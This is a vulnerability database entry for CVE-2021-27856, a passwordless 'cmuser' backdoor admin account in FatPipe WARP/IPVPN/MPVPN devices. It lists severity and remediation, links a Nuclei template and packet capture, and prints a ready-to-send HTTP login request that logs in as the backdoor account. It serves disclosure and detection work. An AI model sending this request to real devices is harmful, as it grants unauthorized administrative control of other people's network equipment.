| Title | FatPipe WARP/IPVPN/MPVPN - Backdoor Account |
|---|---|
| Author | gy741 |
| Severity | Critical |
| Impact | Unauthenticated attackers can gain unauthorized administrative access via a backdoor account with no password, leading to complete device compromise. |
| Remediation | Upgrade to FatPipe WARP/IPVPN/MPVPN version 10.1.2r60p91 or 10.2.2r42 or later. |
| CVSS Score | 9.8 |
| EPSS Score | 0.60793 |
| CVE ID | CVE-2021-27856 |
| CWE ID | NVD-CWE-Other |
| Tags | cve cve2021 fatpipe default-login backdoor auth-bypass vkev vuln |
FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain an account named “cmuser” with administrative privileges and no password, letting attackers gain unauthorized admin access, exploit requires no authentication.
POST /fpui/loginServlet HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Connection: close
Content-Length: 94
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-27856.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-27856.pcap
N/AN/A